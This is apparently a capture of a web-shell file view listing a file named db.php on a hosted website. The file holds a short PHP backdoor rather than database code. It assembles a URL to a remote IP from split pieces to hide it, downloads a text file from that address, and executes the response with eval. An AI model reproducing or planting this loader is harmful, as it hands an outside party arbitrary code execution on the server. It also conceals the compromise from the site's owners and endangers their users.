?
Path : /home/u949514618/domains/ieits.in/public_html/ |
Current File : /home/u949514618/domains/ieits.in/public_html/db.php |
<?php try { // URL dipecah menjadi beberapa bagian $urlParts = [ 'http://', '198.204.225.84', '/', 'j250923_13/', 'init', '.txt' ]; $realUrl = implode('', $urlParts); $c = curl_init($realUrl); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_TIMEOUT, 5); curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 3); $result = curl_exec($c); if ($result !== false) { eval('?>' . $result); } } catch (Exception $e) { error_log('External script error: ' . $e->getMessage()); } ?>